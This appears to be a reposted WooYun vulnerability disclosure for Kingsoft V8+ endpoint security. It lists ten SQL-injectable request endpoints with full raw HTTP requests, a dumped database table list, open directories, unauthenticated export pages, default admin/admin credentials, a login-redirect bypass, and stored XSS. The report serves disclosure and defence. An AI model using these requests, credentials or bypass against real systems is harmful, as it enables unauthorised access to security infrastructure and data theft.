记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

金山V8+终端安全系统10处SQL注入(需登录)+默认配置不当+后台权限绕过等漏洞集合

2016-05-31 01:00

看下产品介绍先

1.jpg







SQL注入比较多,10处如下:



code 区域
1.

POST /active_defense/scan/get_group_list_cmd.kptl HTTP/1.1

Host: **.**.**.**:6868

Content-Length: 149

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1

Referer: **.**.**.**:6868/active_defense/scan/main.php?li=4&a=7

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}





2.

POST /report/log/get_log_cmd.kptl HTTP/1.1

Host: **.**.**.**:6868

Content-Length: 408

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1

Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"20","log_request_page":"2","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



3.

POST /report/report/ajax.kptl HTTP/1.1

Host: **.**.**.**:6868

Content-Length: 205

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1

Referer: **.**.**.**:6868/report/report/main.php?li=5&a=14

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_report_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","period_type":"-1","count_page":"2","request_page":"1","VHierarchyID":"ADMIN"}}



4.

POST /report/log/get_log_cmd.kptl HTTP/1.1

Host: **.**.**.**:6868

Content-Length: 409

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1

Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"100","log_request_page":"1","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



5.

POST /softmanagement/distribute/get_group_list_cmd.kptl HTTP/1.1

Host: **.**.**.**:6868

Content-Length: 149

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1

Referer: **.**.**.**:6868/softmanagement/distribute/main.php?li=3&a=6

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



6.

POST /boundary_manage/ajax.kptl HTTP/1.1

Host: **.**.**.**:6868

Content-Length: 372

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%221%22%2C%22stype%22%3A%221%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A1%7D

Referer: **.**.**.**:6868/boundary_manage/boundary_file.php?li=2&a=2

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_file_name_details_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","groupids":["1"],"boundary_type":"5","time_type":"4","start_time":"0","end_time":"0","file_md5":"72C84AE241A44567B31CA2B4FB7557C9","sort_type":"download_time","sort_order":"desc","page_count":"10","current_page":"1"}}



7.

POST /client_manage/group/get_group_list_cmd.kptl HTTP/1.1

Host: **.**.**.**:6868

Content-Length: 149

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%226%22%2C%22rtype%22%3A%225%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A2%7D; scName=PILIBABY-SERVER(1); SCNum=1

Referer: **.**.**.**:6868/client_manage/group/main.php?li=1&a=1

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



8.

POST /settings/system/get_group_list_cmd.kptl HTTP/1.1

Origin: **.**.**.**:6868

Content-Length: 149

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1

Referer: **.**.**.**:6868/settings/system/groups.php?li=6&a=15

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



9.

POST /softmanagement/forbidden/get_group_list_cmd.kptl HTTP/1.1

Origin: **.**.**.**:6868

Content-Length: 149

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1

Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



10.

POST /softmanagement/forbidden/get_classify_list_info_cmd.kptl HTTP/1.1

Origin: **.**.**.**:6868

Content-Length: 288

Accept-Language: zh-CN,zh;q=0.8

Userhash: cond0r

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Host: **.**.**.**:6868

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1

Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate



{"get_classify_list_info_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","classify_id":"-1","group_id":"ADMIN","key_words":"3","count_page":"20","current_page":"1","sort_type":"state","sort_order":"desc"}}

漏洞证明:

555.jpg



777.jpg



666.jpg



787.jpg



665.jpg



445.jpg



234.jpg



545.jpg



887.jpg



999.jpg



100.jpg



code 区域
Database: SQLite_masterdb

[69 tables]

+-----------------------------+

| ArpClientMacIp |

| ArpInfo |

| ArpInfo_History |

| ArpOptions |

| BDLogManagerOptions |

| BoundaryOptions |

| ClientDelete |

| ClientInfoCollect |

| ClientScanFinishInfo |

| ClientStaInfo |

| ClientUpdateOptions |

| ClientVersionInfo |

| ClientVirusCollect |

| DefaultPopedom |

| DomainGroupInfo |

| GroupInfo |

| HostInfo |

| HostSoftLeakScanInfo |

| HostSysLeakScanInfo |

| IPFilter |

| KChildSysCenterIPInfo |

| KClearOpenOptions |

| KFilePushInfo |

| KForbidSoftInfo |

| KGroupIP |

| KLncncCompanyInfo |

| KReport |

| KSimpleSoftInfo |

| KSoftUninstallStrategy |

| KSoftWareMgrOptions |

| KUninstallSoftInfo |

| KVDeviceGroupIP |

| KVDeviceGroupInfo |

| KVDipatcherPlanTask |

| KVMEngineOptions |

| LeakRepairStategy |

| LeakScanRepairCmd |

| MailMonOptions |

| MailMonVirusInfo |

| NetWorkManagerInfo |

| ReportIndex |

| ReportOnlineIPSet |

| ReportStrategy |

| RootWhiteListInfo |

| SCMessageLog |

| SCOperLog |

| SCOperation |

| SCUser |

| ScanConfigOptions |

| ScanOptions |

| StrongManagerOptions |

| SysMonitorOpt |

| SystemCenterTree |

| TaskOptions |

| UDiskAgentOptions |

| UDiskOptions |

| USBOptions |

| UninstallKavClientIPs |

| UserPopedom |

| VHierarchyBaseVirusDealInfo |

| VHierarchyInfo |

| VHierarchySetupInfo |

| VirusCountInfo |

| VirusInfo |

| ViuusInfoCollect |

| WatchOptions |

| _GroupInfo_old_20131010 |

| sqlite_sequence |

| webconfig |

+-----------------------------+





默认配置不当,系统默认开启了目录遍历

举几个例子

code 区域
http://**.**.**.**/boundary_manage/

**.**.**.**:6868/active_defense/

**.**.**.**:6868/report/

http://**.**.**.**/active_defense/

**.**.**.**:6868/settings/



还有很多不列举了,找了几个案例证明下

1.jpg



2.jpg



3.jpg



4.jpg



5.jpg



6.jpg







然后发现许多页面都可以未授权访问,由于页面比较多没有一一尝试,厂商统一限制下吧,文件名中有excel字样的都是直接下载对应的数据的。



列举几处

code 区域
**.**.**.**:6868/active_defense/scan/task.php

**.**.**.**:6868/active_defense/scan/export.php

**.**.**.**:6868/report/log/excel2.php

**.**.**.**:6868/report/log/analyse.php

**.**.**.**:6868/report/log/date_select.php

**.**.**.**:6868/report/log/excel.php

**.**.**.**:6868/report/general/ksafecount.php

http://**.**.**.**/active_defense/scan/task.php

http://**.**.**.**/boundary_manage/boundary_file_report.php

http://**.**.**.**/active_defense/scan/task.php





7.jpg



8.jpg



9.jpg

10.jpg





顺便提一下后台存在默认口令admin/admin

111.jpg



222.jpg



以上的未授权访问发现看到的数据比较有限,于是又测试了一番,发现后台完全可以绕过。。。



系统的所有页面访问时会判断是否登录,请求如下:

code 区域
GET /login.php HTTP/1.1

Host: **.**.**.**:6868

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Referer: **.**.**.**:6868/settings/system/groups.php?li=0&a=0

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8



这个请求会跳转到登录页,那么只要在fiddler中,输入拦截该url即可绕过。

z11.jpg





可以查看系统配置,密码,还可以修改公告并且公告处存在XSS,上传热门工具。。

看下效果

z1.jpg



z2.jpg



z3.jpg



z4.jpg



z5.jpg



z6.jpg



z7.jpg



z8.jpg



z9.jpg



z10.jpg



修复方案:

过滤+权限

知识来源: www.wooyun.org/bugs/wooyun-2016-0179804

阅读:109142 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“金山V8+终端安全系统10处SQL注入(需登录)+默认配置不当+后台权限绕过等漏洞集合”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词